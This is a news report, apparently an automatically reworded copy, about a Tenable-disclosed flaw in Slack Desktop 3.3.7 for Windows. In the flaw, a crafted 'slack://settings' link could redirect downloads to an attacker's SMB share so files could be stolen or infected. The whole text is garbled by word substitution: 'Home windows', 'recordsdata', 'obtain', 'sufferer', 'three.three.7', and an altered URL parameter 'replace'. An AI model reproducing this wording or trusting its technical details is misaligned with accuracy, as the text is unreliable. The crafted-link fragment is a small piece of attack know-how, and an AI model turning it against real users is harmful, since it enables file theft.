Enlarge / Strangers in your Slack channel may have messed with Slack for Home windows’ obtain settings, redirecting recordsdata to a malicious shared folder. It is fastened now. NOAH BERGER/AFP/Getty Photographs
On Might 17, researchers at Tenable revealed that that they had found a vulnerability within the Home windows model of the desktop software for Slack, the widely-used collaboration service. The vulnerability, in Slack Desktop model three.three.7 for Home windows, may have been used to alter the vacation spot of a file obtain from a Slack dialog to a distant file share owned by an attacker. This is able to permit the attacker not solely to steal the recordsdata that had been downloaded by a focused person going ahead, however it will doubtlessly permit them to change the recordsdata and add malware to them—that approach when the sufferer opened the recordsdata, they might get a doubtlessly nasty shock.
Tenable reported the vulnerability to Slack by way of HackerOne. Slack has issued an replace to the Home windows desktop consumer that closes the vulnerability.
The potential assault used a weak spot in the way in which the “slack://” protocol handler was carried out within the Home windows software. By making a crafted hyperlink posted in a Slack channel, the attacker may alter the default settings of the consumer—altering the obtain listing, for instance, to a brand new location with a URL similar to “slack://settings/?replace=”. That path may very well be directed to a Server Message Block (SMB) file sharing location managed by the attacker. As soon as clicked, all future downloads could be dropped onto the attacker’s SMB server. This hyperlink may very well be disguised as a Internet hyperlink—in a proof-of-concept, the malicious Slack assault posed as a hyperlink to Google.
Enlarge / A dissected view of a crafted Slack message with a malicious URL that modifications the situation the place the Slack desktop software for Home windows saves downloads.In a weblog publish, Tenable’s David Wells reviewed a number of ways in which this may very well be used maliciously. As soon as the attacker had modified the default obtain location, “the attacker may haven’t solely stolen the doc, however even inserted malicious code in it in order that when opened by sufferer after obtain (by the Slack software), their machine would have been contaminated,” Wells wrote.
An attacker would not even need to be a member of a Slack channel to efficiently inject the URL, Wells famous—the hyperlink may very well be fed right into a channel by way of an RSS feed, for instance, as Slack channels may be set as much as subscribe to them. “I may make a publish to a highly regarded Reddit group that Slack customers around the globe are subscribed to,” Wells defined. That publish may embrace a Internet hyperlink “that can redirect to our malicious slack:// hyperlink and alter settings when clicked.” Nonetheless, this assault would probably throw up a dialog field warning Internet hyperlink was attempting to open Slack—so it would not work except a sufferer clicked with approval.